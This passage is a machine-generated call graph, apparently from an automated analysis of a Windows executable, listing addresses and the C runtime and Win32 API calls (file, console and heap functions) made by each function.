38966->38971 38968 7ff6d7f1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38967->38968 38969 7ff6d7f07f93 38968->38969 38969->38966 38970 7ff6d7f1b57c 14 API calls 38969->38970 38970->38966 38972 7ff6d7f2b698 38971->38972 38972->38916 38973->38904 38974->38903 38975->38908 38976->38907 38978 7ff6d7f2e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38977->38978 38990 7ff6d7f2eb08 38978->38990 38981 7ff6d7f2aab3 38981->38924 38985 7ff6d7f345e4 38981->38985 38983 7ff6d7f2e318 38983->38981 38997 7ff6d7f2eb50 DeleteCriticalSection 38983->38997 38986 7ff6d7f39d4c 38985->38986 38987 7ff6d7f2aac0 38986->38987 39014 7ff6d7f366c0 38986->39014 38987->38924 38989 7ff6d7f2e32c 8 API calls 3 library calls 38987->38989 38989->38924 38991 7ff6d7f2eb10 38990->38991 38993 7ff6d7f2eb41 38991->38993 38994 7ff6d7f2e30b 38991->38994 38998 7ff6d7f2e678 38991->38998 39003 7ff6d7f2eb50 DeleteCriticalSection 38993->39003 38994->38981 38996 7ff6d7f2e8a4 8 API calls 3 library calls 38994->38996 38996->38983 38997->38981 39004 7ff6d7f2e34c 38998->39004 39001 7ff6d7f2e6cf InitializeCriticalSectionAndSpinCount 39002 7ff6d7f2e6bb 39001->39002 39002->38991 39003->38994 39005 7ff6d7f2e3ad 39004->39005 39006 7ff6d7f2e3b2 39004->39006 39005->39006 39007 7ff6d7f2e3e5 LoadLibraryExW 39005->39007 39011 7ff6d7f2e47a 39005->39011 39013 7ff6d7f2e458 FreeLibrary 39005->39013 39006->39001 39006->39002 39007->39005 39008 7ff6d7f2e40b GetLastError 39007->39008 39008->39005 39010 7ff6d7f2e416 LoadLibraryExW 39008->39010 39009 7ff6d7f2e489 GetProcAddress 39009->39006 39012 7ff6d7f2e4a1 39009->39012 39010->39005 39011->39006 39011->39009 39012->39006 39013->39005 39025 7ff6d7f36938 EnterCriticalSection 39014->39025 39016 7ff6d7f366d0 39017 7ff6d7f38050 32 API calls 39016->39017 39018 7ff6d7f366d9 39017->39018 39020 7ff6d7f364d0 34 API calls 39018->39020 39024 7ff6d7f366e7 39018->39024 39019 7ff6d7f36998 abort LeaveCriticalSection 39021 7ff6d7f366f3 39019->39021 39022 7ff6d7f366e2 39020->39022 39021->38986 39023 7ff6d7f365bc GetStdHandle GetFileType 39022->39023 39023->39024 39024->39019 39027 7ff6d7f2b020 pre_c_initialization 39026->39027 39047 7ff6d7f32b00 39027->39047 39029 7ff6d7f2b02c pre_c_initialization 39053 7ff6d7f2aad8 39029->39053 39031 7ff6d7f2b045 39032 7ff6d7f2b049 _RTC_Initialize 39031->39032 39033 7ff6d7f2b0b5 39031->39033 39058 7ff6d7f2ace0 39032->39058 39090 7ff6d7f2b52c 7 API calls __scrt_fastfail 39033->39090 39035 7ff6d7f2b0bf 39091 7ff6d7f2b52c 7 API calls __scrt_fastfail 39035->39091 39037 7ff6d7f2b05a pre_c_initialization 39061 7ff6d7f33b0c 39037->39061 39039 7ff6d7f2b0ca __scrt_initialize_default_local_stdio_options 39039->38928 39042 7ff6d7f2b06a 39089 7ff6d7f2b7dc RtlInitializeSListHead 39042->39089 39044 7ff6d7f2b06f __CxxCallCatchBlock pre_c_initialization 39045 7ff6d7f34818 pre_c_initialization 35 API calls 39044->39045 39046 7ff6d7f2b09a pre_c_initialization 39045->39046 39046->38928 39048 7ff6d7f32b11 39047->39048 39049 7ff6d7f32b19 39048->39049 39092 7ff6d7f34f3c 15 API calls abort 39048->39092 39049->39029 39051 7ff6d7f32b28 39093 7ff6d7f34e1c 31 API calls _invalid_parameter_noinfo 39051->39093 39054 7ff6d7f2ab96 39053->39054 39057 7ff6d7f2aaf0 __scrt_initialize_onexit_tables 39053->39057 39094 7ff6d7f2b52c 7 API calls __scrt_fastfail 39054->39094 39056 7ff6d7f2aba0 39057->39031 39095 7ff6d7f2ac90 39058->39095 39060 7ff6d7f2ace9 39060->39037 39062 7ff6d7f33b2a 39061->39062 39063 7ff6d7f33b40 39061->39063 39100 7ff6d7f34f3c 15 API calls abort 39062->39100 39102 7ff6d7f39370 39063->39102 39066 7ff6d7f33b2f 39101 7ff6d7f34e1c 31 API calls _invalid_parameter_noinfo 39066->39101 39069 7ff6d7f33b72 39106 7ff6d7f338ec 35 API calls pre_c_initialization 39069->39106 39070 7ff6d7f2b066 39070->39035 39070->39042 39072 7ff6d7f33b9c 39107 7ff6d7f33aa8 15 API calls 2 library calls 39072->39107 39074 7ff6d7f33bb2 39075 7ff6d7f33bba 39074->39075 39076 7ff6d7f33bcb 39074->39076 39108 7ff6d7f34f3c 15 API calls abort 39075->39108 39109 7ff6d7f338ec 35 API calls pre_c_initialization 39076->39109 39079 7ff6d7f34a74 __vcrt_freefls 15 API calls 39079->39070 39080 7ff6d7f33be7 39081 7ff6d7f33c17 39080->39081 39082 7ff6d7f33c30 39080->39082 39087 7ff6d7f33bbf 39080->39087 39110 7ff6d7f34a74 39081->39110 39085 7ff6d7f34a74 __vcrt_freefls 15 API calls 39082->39085 39084 7ff6d7f33c20 39086 7ff6d7f34a74 __vcrt_freefls 15 API calls 39084->39086 39085->39087 39088 7ff6d7f33c2c 39086->39088 39087->39079 39088->39070 39090->39035 39091->39039 39092->39051 39093->39049 39094->39056 39096 7ff6d7f2acbf 39095->39096 39097 7ff6d7f2acb5 _onexit 39095->39097 39099 7ff6d7f34434 34 API calls _onexit 39096->39099 39097->39060 39099->39097 39100->39066 39101->39070 39103 7ff6d7f3937d 39102->39103 39104 7ff6d7f33b45 GetModuleFileNameA 39102->39104 39116 7ff6d7f391b0 48 API calls 5 library calls 39103->39116 39104->39069 39106->39072 39107->39074 39108->39087 39109->39080 39111 7ff6d7f34a79 RtlFreeHeap 39110->39111 39112 7ff6d7f34aa9 __vcrt_freefls 39110->39112 39111->39112 39113 7ff6d7f34a94 39111->39113 39112->39084 39117 7ff6d7f34f3c 15 API calls abort 39113->39117 39115 7ff6d7f34a99 GetLastError 39115->39112 39116->39104 39117->39115 39119 7ff6d7f33c98 39118->39119 39120 7ff6d7f33ca1 39118->39120 39119->39120 39124 7ff6d7f33ccc 39119->39124 39120->38931 39125 7ff6d7f33ce5 39124->39125 39134 7ff6d7f33caa 39124->39134 39126 7ff6d7f39370 pre_c_initialization 48 API calls 39125->39126 39127 7ff6d7f33cea 39126->39127 39137 7ff6d7f3978c GetEnvironmentStringsW 39127->39137 39129 7ff6d7f33cf7 39133 7ff6d7f34a74 __vcrt_freefls 15 API calls 39129->39133 39132 7ff6d7f33d04 39135 7ff6d7f34a74 __vcrt_freefls 15 API calls 39132->39135 39133->39134 39134->39120 39136 7ff6d7f33e78 17 API calls 2 library calls 39134->39136 39135->39129 39136->39120 39138 7ff6d7f3985e 39137->39138 39140 7ff6d7f397ba WideCharToMultiByte 39137->39140 39141 7ff6d7f39868 FreeEnvironmentStringsW 39138->39141 39142 7ff6d7f33cef 39138->39142 39140->39138 39143 7ff6d7f39814 39140->39143 39141->39142 39142->39129 39149 7ff6d7f33d38 31 API calls 4 library calls 39142->39149 39150 7ff6d7f34ab4 39143->39150 39146 7ff6d7f39824 WideCharToMultiByte 39147 7ff6d7f3984b 39146->39147 39148 7ff6d7f34a74 __vcrt_freefls 15 API calls 39147->39148 39148->39138 39149->39132 39151 7ff6d7f34aff 39150->39151 39152 7ff6d7f34ac3 __vcrt_getptd_noexit 39150->39152 39157 7ff6d7f34f3c 15 API calls abort 39151->39157 39152->39151 39153 7ff6d7f34ae6 RtlAllocateHeap 39152->39153 39156 7ff6d7f336c0 new 2 API calls 39152->39156 39153->39152 39155 7ff6d7f34afd 39153->39155 39155->39146 39155->39147 39156->39152 39157->39155 39159 7ff6d7f1b496 GetProcAddress 39158->39159 39160 7ff6d7f07e45 39158->39160 39161 7ff6d7f1b4cb GetProcAddress 39159->39161 39162 7ff6d7f1b4ae 39159->39162 39163 7ff6d7ee7a68 39160->39163 39161->39160 39162->39161 39164 7ff6d7ee7a76 39163->39164 39184 7ff6d7f32ae4 39164->39184 39166 7ff6d7ee7a80 39167 7ff6d7f32ae4 setbuf 60 API calls 39166->39167 39168 7ff6d7ee7a94 39167->39168 39193 7ff6d7ee7b44 GetStdHandle GetFileType 39168->39193 39171 7ff6d7ee7b44 3 API calls 39172 7ff6d7ee7aae 39171->39172 39173 7ff6d7ee7b44 3 API calls 39172->39173 39175 7ff6d7ee7abe 39173->39175 39174 7ff6d7ee7b12 39183 7ff6d7eecd78 SetConsoleCtrlHandler 39174->39183 39176 7ff6d7ee7aeb 39175->39176 39196 7ff6d7f32abc 31 API calls 2 library calls 39175->39196 39176->39174 39198 7ff6d7f32abc 31 API calls 2 library calls 39176->39198 39179 7ff6d7ee7adf 39197 7ff6d7f32b40 33 API calls 3 library calls 39179->39197 39180 7ff6d7ee7b06 39199 7ff6d7f32b40 33 API calls 3 library calls 39180->39199 39186 7ff6d7f32ae9 39184->39186 39185 7ff6d7f37ee8 39200 7ff6d7f34f3c 15 API calls abort 39185->39200 39186->39185 39188 7ff6d7f37f23 39186->39188 39202 7ff6d7f37d98 60 API calls 2 library calls 39188->39202 39189 7ff6d7f37eed 39201 7ff6d7f34e1c 31 API calls _invalid_parameter_noinfo 39189->39201 39192 7ff6d7f37ef8 39192->39166 39194 7ff6d7ee7a9e 39193->39194 39195 7ff6d7ee7b61 GetConsoleMode 39193->39195 39194->39171 39195->39194 39196->39179 39197->39176 39198->39180 39199->39174 39200->39189 39201->39192 39202->39192 39203 7ff6d7f3231c 39204 7ff6d7f3238c 39203->39204 39205 7ff6d7f32342 GetModuleHandleW 39203->39205 39216 7ff6d7f36938 EnterCriticalSection 39204->39216 39205->39204 39207 7ff6d7f3234f 39205->39207 39207->39204 39217 7ff6d7f324d4 GetModuleHandleExW 39207->39217 39208 7ff6d7f32410 39209 7ff6d7f36998 abort LeaveCriticalSection 39208->39209 39211 7ff6d7f32460 39209->39211 39210 7ff6d7f3246c 39211->39210 39215 7ff6d7f32488 11 API calls 39211->39215 39212 7ff6d7f343b8 16 API calls 39212->39208 39214 7ff6d7f32396 39214->39208 39214->39212 39215->39210 39218 7ff6d7f324fe GetProcAddress 39217->39218 39219 7ff6d7f32525 39217->39219 39218->39219 39222 7ff6d7f32518 39218->39222 39220 7ff6d7f3252f FreeLibrary 39219->39220 39221 7ff6d7f32535 39219->39221 39220->39221 39221->39204 39222->39219 39223 7ff6d7ed82f0 39224 7ff6d7ed8306 39223->39224 39233 7ff6d7ed836f 39223->39233 39225 7ff6d7ed8324 39224->39225 39229 7ff6d7ed8371 39224->39229 39224->39233 39343 7ff6d7ef2414 61 API calls 39225->39343 39227 7ff6d7ed8347 39344 7ff6d7ef1998 138 API calls 39227->39344 39229->39233 39345 7ff6d7ef1998 138 API calls 39229->39345 39230 7ff6d7ed835e 39232 7ff6d7ef18ac 15 API calls 39230->39232 39232->39233 39246 7ff6d7eda410 39233->39246 39237 7ff6d7ed8578 39238 7ff6d7edb540 147 API calls 39237->39238 39243 7ff6d7ed858f 39238->39243 39239 7ff6d7edb540 147 API calls 39239->39237 39240 7ff6d7ed8634 39241 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39240->39241 39242 7ff6d7ed8663 39241->39242 39243->39240 39346 7ff6d7ed9628 175 API calls 39243->39346 39347 7ff6d7f07a68 39246->39347 39249 7ff6d7ed853a 39251 7ff6d7edb540 39249->39251 39255 7ff6d7edb55f setbuf 39251->39255 39252 7ff6d7edb5a1 39253 7ff6d7edb5d8 39252->39253 39254 7ff6d7edb5b8 39252->39254 39495 7ff6d7f08c1c 39253->39495 39381 7ff6d7edaba0 39254->39381 39255->39252 39377 7ff6d7eda4d0 39255->39377 39257 7ff6d7edb5d3 39259 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39257->39259 39260 7ff6d7ed854f 39259->39260 39260->39237 39260->39239 39261 7ff6d7edb67f 39262 7ff6d7edb6a5 39261->39262 39263 7ff6d7edbbae 39261->39263 39282 7ff6d7edbc91 39261->39282 39262->39257 39268 7ff6d7edb79f 39262->39268 39275 7ff6d7edb6b5 39262->39275 39266 7ff6d7f08d00 48 API calls 39263->39266 39265 7ff6d7ef2574 126 API calls 39265->39257 39269 7ff6d7edbc5c 39266->39269 39294 7ff6d7edb8e5 39268->39294 39546 7ff6d7edc3c8 CharLowerW CharUpperW 39268->39546 39564 7ff6d7f08d38 48 API calls 39269->39564 39273 7ff6d7edbc69 39565 7ff6d7f08d38 48 API calls 39273->39565 39275->39257 39529 7ff6d7f08d00 39275->39529 39276 7ff6d7edbc76 39566 7ff6d7f08d38 48 API calls 39276->39566 39278 7ff6d7edbc84 39567 7ff6d7f08d88 48 API calls 39278->39567 39282->39257 39282->39265 39284 7ff6d7edb726 39533 7ff6d7f08d38 48 API calls 39284->39533 39286 7ff6d7edb733 39287 7ff6d7edb749 39286->39287 39534 7ff6d7f08d88 48 API calls 39286->39534 39289 7ff6d7edb75c 39287->39289 39535 7ff6d7f08d38 48 API calls 39287->39535 39290 7ff6d7edb779 39289->39290 39293 7ff6d7f08d00 48 API calls 39289->39293 39536 7ff6d7f08f94 39290->39536 39293->39289 39547 7ff6d7f1d840 WideCharToMultiByte 39294->39547 39298 7ff6d7edb9a1 39301 7ff6d7f08d00 48 API calls 39298->39301 39299 7ff6d7edb910 39299->39298 39549 7ff6d7ed945c 55 API calls _UnwindNestedFrames 39299->39549 39302 7ff6d7edb9c4 39301->39302 39550 7ff6d7f08d38 48 API calls 39302->39550 39304 7ff6d7edb9d1 39551 7ff6d7f08d38 48 API calls 39304->39551 39306 7ff6d7edb9de 39552 7ff6d7f08d88 48 API calls 39306->39552 39308 7ff6d7edb9eb 39553 7ff6d7f08d88 48 API calls 39308->39553 39310 7ff6d7edba0b 39311 7ff6d7f08d00 48 API calls 39310->39311 39312 7ff6d7edba27 39311->39312 39554 7ff6d7f08d88 48 API calls 39312->39554 39314 7ff6d7edba37 39315 7ff6d7edba49 39314->39315 39555 7ff6d7f1bc48 15 API calls 39314->39555 39556 7ff6d7f08d88 48 API calls 39315->39556 39318 7ff6d7edba59 39319 7ff6d7f08d00 48 API calls 39318->39319 39320 7ff6d7edba66 39319->39320 39321 7ff6d7f08d00 48 API calls 39320->39321 39322 7ff6d7edba78 39321->39322 39557 7ff6d7f08d38 48 API calls 39322->39557 39324 7ff6d7edba85 39558 7ff6d7f08d88 48 API calls 39324->39558 39326 7ff6d7edba92 39327 7ff6d7edbacd 39326->39327 39559 7ff6d7f08d88 48 API calls 39326->39559 39561 7ff6d7f08e3c 39327->39561 39330 7ff6d7edbab2 39560 7ff6d7f08d88 48 API calls 39330->39560 39332 7ff6d7edbb33 39335 7ff6d7edbb53 39332->39335 39339 7ff6d7f08e3c 48 API calls 39332->39339 39334 7ff6d7f08d00 48 API calls 39337 7ff6d7edbb09 39334->39337 39336 7ff6d7edbb6e 39335->39336 39340 7ff6d7f08e3c 48 API calls 39335->39340 39341 7ff6d7f08f94 126 API calls 39336->39341 39337->39332 39338 7ff6d7f08e3c 48 API calls 39337->39338 39338->39332 39339->39335 39340->39336 39341->39257 39343->39227 39344->39230 39345->39233 39346->39240 39349 7ff6d7f07a8d 39347->39349 39354 7ff6d7eda434 39347->39354 39348 7ff6d7f07aaf 39350 7ff6d7ef22e0 12 API calls 39348->39350 39348->39354 39349->39348 39360 7ff6d7f07340 157 API calls 39349->39360 39352 7ff6d7f07adf 39350->39352 39361 7ff6d7ef2440 39352->39361 39354->39249 39355 7ff6d7ef22e0 39354->39355 39371 7ff6d7ef20b4 39355->39371 39358 7ff6d7ef2307 39358->39249 39360->39348 39362 7ff6d7ef2454 39361->39362 39363 7ff6d7ef246a SetFilePointer 39361->39363 39364 7ff6d7ef24ad 39362->39364 39369 7ff6d7eecd00 10 API calls 39362->39369 39363->39364 39365 7ff6d7ef248d GetLastError 39363->39365 39364->39354 39365->39364 39366 7ff6d7ef2497 39365->39366 39366->39364 39370 7ff6d7eecd00 10 API calls 39366->39370 39374 7ff6d7ef2130 39371->39374 39375 7ff6d7ef20d0 39371->39375 39372 7ff6d7ef2102 SetFilePointer 39373 7ff6d7ef2126 GetLastError 39372->39373 39372->39374 39373->39374 39374->39358 39376 7ff6d7eecd00 10 API calls 39374->39376 39375->39372 39378 7ff6d7eda4ea 39377->39378 39379 7ff6d7eda4ee 39378->39379 39380 7ff6d7ef2440 12 API calls 39378->39380 39379->39252 39380->39379 39382 7ff6d7edabbf setbuf 39381->39382 39383 7ff6d7f08c1c 48 API calls 39382->39383 39389 7ff6d7edabf5 39383->39389 39384 7ff6d7edaca7 39385 7ff6d7edb4af 39384->39385 39386 7ff6d7edacbf 39384->39386 39390 7ff6d7edb4ff 39385->39390 39392 7ff6d7ef2574 126 API calls 39385->39392 39387 7ff6d7edb35c 39386->39387 39388 7ff6d7edacc8 39386->39388 39394 7ff6d7f08eec 48 API calls 39387->39394 39396 7ff6d7edacdd 39388->39396 39399 7ff6d7edad60 39388->39399 39425 7ff6d7edaea7 39388->39425 39389->39384 39389->39385 39391 7ff6d7ee9be0 14 API calls 39389->39391 39393 7ff6d7f072c0 4 API calls 39390->39393 39397 7ff6d7edac34 39391->39397 39392->39390 39393->39399 39395 7ff6d7edb395 39394->39395 39398 7ff6d7edb3ad 39395->39398 39586 7ff6d7ed9e2c 48 API calls 39395->39586 39400 7ff6d7edace6 39396->39400 39401 7ff6d7edad68 39396->39401 39402 7ff6d7ee90b8 75 API calls 39397->39402 39406 7ff6d7f08eec 48 API calls 39398->39406 39405 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39399->39405 39400->39399 39568 7ff6d7f08eec 39400->39568 39404 7ff6d7f08eec 48 API calls 39401->39404 39407 7ff6d7edac8f 39402->39407 39408 7ff6d7edad9c 39404->39408 39409 7ff6d7edb52b 39405->39409 39410 7ff6d7edb3d4 39406->39410 39407->39384 39415 7ff6d7ef2574 126 API calls 39407->39415 39412 7ff6d7f08eec 48 API calls 39408->39412 39409->39257 39413 7ff6d7edb3e6 39410->39413 39417 7ff6d7f08eec 48 API calls 39410->39417 39416 7ff6d7edada9 39412->39416 39420 7ff6d7f08eec 48 API calls 39413->39420 39415->39384 39419 7ff6d7f08eec 48 API calls 39416->39419 39417->39413 39418 7ff6d7f08eec 48 API calls 39421 7ff6d7edad31 39418->39421 39422 7ff6d7edadb5 39419->39422 39430 7ff6d7edb451 39420->39430 39423 7ff6d7f08eec 48 API calls 39421->39423 39424 7ff6d7f08eec 48 API calls 39422->39424 39426 7ff6d7edad46 39423->39426 39429 7ff6d7edadc2 39424->39429 39436 7ff6d7edafda 39425->39436 39576 7ff6d7ed9b64 48 API calls _UnwindNestedFrames 39425->39576 39431 7ff6d7f08f94 126 API calls 39426->39431 39427 7ff6d7edb486 39434 7ff6d7f08f94 126 API calls 39427->39434 39428 7ff6d7edb471 39428->39427 39433 7ff6d7f08e3c 48 API calls 39428->39433 39435 7ff6d7f08d00 48 API calls 39429->39435 39430->39428 39432 7ff6d7f08eec 48 API calls 39430->39432 39431->39399 39432->39428 39433->39427 39434->39399 39437 7ff6d7edadcf 39435->39437 39446 7ff6d7edaff2 39436->39446 39577 7ff6d7ed9d98 48 API calls 39436->39577 39439 7ff6d7ee90b8 75 API calls 39437->39439 39441 7ff6d7edae22 39439->39441 39442 7ff6d7f08e3c 48 API calls 39441->39442 39443 7ff6d7edae33 39442->39443 39444 7ff6d7f08e3c 48 API calls 39443->39444 39445 7ff6d7edae48 39444->39445 39454 7ff6d7f19ce4 8 API calls 39445->39454 39448 7ff6d7edb02b 39446->39448 39578 7ff6d7ed9efc 48 API calls _UnwindNestedFrames 39446->39578 39447 7ff6d7edb0af 39451 7ff6d7edb0c8 39447->39451 39580 7ff6d7eda1a0 48 API calls 2 library calls 39447->39580 39448->39447 39579 7ff6d7eda2c8 48 API calls 39448->39579 39453 7ff6d7edb0e2 39451->39453 39581 7ff6d7eda350 48 API calls _UnwindNestedFrames 39451->39581 39457 7ff6d7f08eec 48 API calls 39453->39457 39456 7ff6d7edae60 39454->39456 39458 7ff6d7f19b70 8 API calls 39456->39458 39459 7ff6d7edb0fc 39457->39459 39460 7ff6d7edae6d 39458->39460 39461 7ff6d7f08eec 48 API calls 39459->39461 39462 7ff6d7f08e3c 48 API calls 39460->39462 39463 7ff6d7edb109 39461->39463 39464 7ff6d7edae80 39462->39464 39465 7ff6d7edb11f 39463->39465 39468 7ff6d7f08eec 48 API calls 39463->39468 39467 7ff6d7f08f94 126 API calls 39464->39467 39572 7ff6d7f08e94 39465->39572 39467->39399 39468->39465 39470 7ff6d7f08eec 48 API calls 39471 7ff6d7edb147 39470->39471 39472 7ff6d7f08e94 48 API calls 39471->39472 39473 7ff6d7edb15f 39472->39473 39474 7ff6d7f08eec 48 API calls 39473->39474 39478 7ff6d7edb16c 39474->39478 39475 7ff6d7edb18a 39476 7ff6d7edb1a9 39475->39476 39583 7ff6d7f08d88 48 API calls 39475->39583 39477 7ff6d7f08e94 48 API calls 39476->39477 39480 7ff6d7edb1bc 39477->39480 39478->39475 39582 7ff6d7f08d88 48 API calls 39478->39582 39482 7ff6d7f08eec 48 API calls 39480->39482 39483 7ff6d7edb1d6 39482->39483 39485 7ff6d7edb1e9 39483->39485 39584 7ff6d7edc3c8 CharLowerW CharUpperW 39483->39584 39485->39485 39486 7ff6d7f08eec 48 API calls 39485->39486 39487 7ff6d7edb21f 39486->39487 39488 7ff6d7f08e3c 48 API calls 39487->39488 39489 7ff6d7edb230 39488->39489 39490 7ff6d7edb247 39489->39490 39491 7ff6d7f08e3c 48 API calls 39489->39491 39492 7ff6d7f08f94 126 API calls 39490->39492 39491->39490 39493 7ff6d7edb278 39492->39493 39493->39399 39585 7ff6d7f070d8 4 API calls 2 library calls 39493->39585 39587 7ff6d7f08f28 39495->39587 39498 7ff6d7ee90b8 39499 7ff6d7ee9123 39498->39499 39511 7ff6d7ee91a9 39498->39511 39499->39511 39605 7ff6d7f17e74 39499->39605 39500 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39502 7ff6d7edb66e 39500->39502 39514 7ff6d7ef2574 39502->39514 39504 7ff6d7f1d840 WideCharToMultiByte 39505 7ff6d7ee9157 39504->39505 39506 7ff6d7ee91c4 39505->39506 39507 7ff6d7ee916a 39505->39507 39505->39511 39624 7ff6d7ee9338 12 API calls _UnwindNestedFrames 39506->39624 39508 7ff6d7ee916f 39507->39508 39509 7ff6d7ee91ab 39507->39509 39508->39511 39609 7ff6d7ee98b0 39508->39609 39623 7ff6d7ee951c 71 API calls _UnwindNestedFrames 39509->39623 39511->39500 39515 7ff6d7ef25a5 39514->39515 39519 7ff6d7ef259e 39514->39519 39516 7ff6d7ef25ab GetStdHandle 39515->39516 39528 7ff6d7ef25ba 39515->39528 39516->39528 39517 7ff6d7ef2619 WriteFile 39517->39528 39518 7ff6d7ef25cf WriteFile 39520 7ff6d7ef260b 39518->39520 39518->39528 39519->39261 39520->39518 39520->39528 39521 7ff6d7ef2658 GetLastError 39521->39528 39523 7ff6d7ef2684 SetLastError 39523->39528 39526 7ff6d7ef2721 39692 7ff6d7eecf14 10 API calls 39526->39692 39528->39517 39528->39518 39528->39519 39528->39521 39528->39526 39689 7ff6d7ef3144 9 API calls 2 library calls 39528->39689 39690 7ff6d7eecf34 10 API calls 39528->39690 39691 7ff6d7eec95c 126 API calls 39528->39691 39530 7ff6d7ed161c 48 API calls 39529->39530 39531 7ff6d7edb719 39530->39531 39532 7ff6d7f08d38 48 API calls 39531->39532 39532->39284 39533->39286 39534->39287 39535->39289 39537 7ff6d7f09131 39536->39537 39538 7ff6d7f08fcf 39536->39538 39537->39257 39540 7ff6d7f0905d 39538->39540 39693 7ff6d7eeca6c 48 API calls 3 library calls 39538->39693 39539 7ff6d7ed161c 48 API calls 39541 7ff6d7f090e0 39539->39541 39540->39539 39540->39541 39541->39537 39542 7ff6d7ef2574 126 API calls 39541->39542 39542->39537 39544 7ff6d7f0904c 39694 7ff6d7eeca40 61 API calls _CxxThrowException 39544->39694 39546->39294 39548 7ff6d7edb8f8 CharToOemA 39547->39548 39548->39299 39549->39298 39550->39304 39551->39306 39552->39308 39553->39310 39554->39314 39555->39315 39556->39318 39557->39324 39558->39326 39559->39330 39560->39327 39562 7ff6d7ed161c 48 API calls 39561->39562 39563 7ff6d7edbaf2 39562->39563 39563->39332 39563->39334 39563->39337 39564->39273 39565->39276 39566->39278 39567->39282 39569 7ff6d7f08efc 39568->39569 39570 7ff6d7f08d00 48 API calls 39569->39570 39571 7ff6d7edad24 39569->39571 39570->39569 39571->39418 39573 7ff6d7f08eac 39572->39573 39574 7ff6d7f08d00 48 API calls 39573->39574 39575 7ff6d7edb137 39573->39575 39574->39573 39575->39470 39576->39436 39577->39446 39578->39448 39579->39447 39580->39451 39581->39453 39582->39475 39583->39476 39584->39485 39585->39399 39586->39398 39590 7ff6d7ed161c 39587->39590 39589 7ff6d7edb601 39589->39261 39589->39282 39589->39498 39591 7ff6d7ed1640 39590->39591 39600 7ff6d7ed16aa __BuildCatchObjectHelper 39590->39600 39592 7ff6d7ed166d 39591->39592 39601 7ff6d7eeca6c 48 API calls 3 library calls 39591->39601 39596 7ff6d7ed16d4 39592->39596 39597 7ff6d7ed168e 39592->39597 39594 7ff6d7ed1661 39602 7ff6d7eecb64 8 API calls 39594->39602 39596->39600 39604 7ff6d7eecb64 8 API calls 39596->39604 39597->39600 39603 7ff6d7eecb64 8 API calls 39597->39603 39600->39589 39601->39594 39606 7ff6d7ee9143 39605->39606 39607 7ff6d7f17e95 39605->39607 39606->39504 39608 7ff6d7f17ec8 68 API calls 39607->39608 39608->39606 39613 7ff6d7ee9920 39609->39613 39619 7ff6d7ee9b45 39609->39619 39610 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39611 7ff6d7ee9b61 39610->39611 39611->39511 39614 7ff6d7ee996d 39613->39614 39615 7ff6d7ee9b75 39613->39615 39625 7ff6d7f17da8 39613->39625 39614->39614 39632 7ff6d7eea0f4 39614->39632 39616 7ff6d7f17f24 68 API calls 39615->39616 39622 7ff6d7ee9acb 39616->39622 39618 7ff6d7ee99d0 39648 7ff6d7f17f24 39618->39648 39619->39610 39622->39619 39662 7ff6d7f14ea8 8 API calls _UnwindNestedFrames 39622->39662 39623->39511 39624->39511 39626 7ff6d7f17e74 68 API calls 39625->39626 39627 7ff6d7f17ddc 39626->39627 39628 7ff6d7f17e74 68 API calls 39627->39628 39629 7ff6d7f17def 39628->39629 39630 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39629->39630 39631 7ff6d7f17e43 39630->39631 39631->39613 39636 7ff6d7eea15c __BuildCatchObjectHelper 39632->39636 39633 7ff6d7eea358 39685 7ff6d7f2a774 8 API calls __report_securityfailure 39633->39685 39635 7ff6d7eea352 39684 7ff6d7f2a774 8 API calls __report_securityfailure 39635->39684 39636->39633 39636->39635 39638 7ff6d7eea192 39636->39638 39639 7ff6d7eea34d 39636->39639 39637 7ff6d7eea35e 39663 7ff6d7ee9dd8 39638->39663 39683 7ff6d7f2a774 8 API calls __report_securityfailure 39639->39683 39643 7ff6d7eea1d9 39644 7ff6d7ee9dd8 8 API calls 39643->39644 39645 7ff6d7eea2f1 39643->39645 39644->39643 39646 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39645->39646 39647 7ff6d7eea33b 39646->39647 39647->39618 39649 7ff6d7f17f5e 39648->39649 39654 7ff6d7f17fb5 39648->39654 39650 7ff6d7f1b3f0 10 API calls 39649->39650 39649->39654 39651 7ff6d7f17f72 39650->39651 39653 7ff6d7f17f7e GetProcAddressForCaller GetProcAddress 39651->39653 39651->39654 39652 7ff6d7f1805c GetCurrentProcessId 39655 7ff6d7f18034 39652->39655 39653->39654 39654->39652 39656 7ff6d7f17ff1 39654->39656 39655->39622 39656->39655 39686 7ff6d7eeca6c 48 API calls 3 library calls 39656->39686 39658 7ff6d7f1801f 39687 7ff6d7eecda4 10 API calls 2 library calls 39658->39687 39660 7ff6d7f18027 39688 7ff6d7eeca40 61 API calls _CxxThrowException 39660->39688 39662->39619 39664 7ff6d7ee9e46 39663->39664 39666 7ff6d7ee9e6e __scrt_fastfail 39663->39666 39665 7ff6d7f19ce4 8 API calls 39664->39665 39667 7ff6d7ee9e5e 39665->39667 39669 7ff6d7ee9e85 39666->39669 39671 7ff6d7f19ce4 8 API calls 39666->39671 39668 7ff6d7f19b70 8 API calls 39667->39668 39668->39666 39670 7ff6d7f19ce4 8 API calls 39669->39670 39672 7ff6d7ee9f97 39670->39672 39671->39669 39673 7ff6d7f19b70 8 API calls 39672->39673 39675 7ff6d7ee9fa8 __scrt_fastfail 39673->39675 39674 7ff6d7ee9fb4 39676 7ff6d7f19ce4 8 API calls 39674->39676 39675->39674 39677 7ff6d7f19ce4 8 API calls 39675->39677 39678 7ff6d7eea0bb 39676->39678 39677->39674 39679 7ff6d7f19b70 8 API calls 39678->39679 39680 7ff6d7eea0c9 39679->39680 39681 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39680->39681 39682 7ff6d7eea0d8 39681->39682 39682->39643 39683->39635 39684->39633 39685->39637 39686->39658 39687->39660 39688->39655 39689->39523 39691->39528 39693->39544 39694->39540 39695 7ff6d7ed3e71 39696 7ff6d7ed3e81 39695->39696 39697 7ff6d7ed3e89 39695->39697 39706 7ff6d7f29a14 49 API calls 39696->39706 39699 7ff6d7ed3edd 39697->39699 39700 7ff6d7ed3ea3 39697->39700 39702 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 39699->39702 39707 7ff6d7ef331c 48 API calls 2 library calls 39700->39707 39703 7ff6d7ed3eef 39702->39703 39704 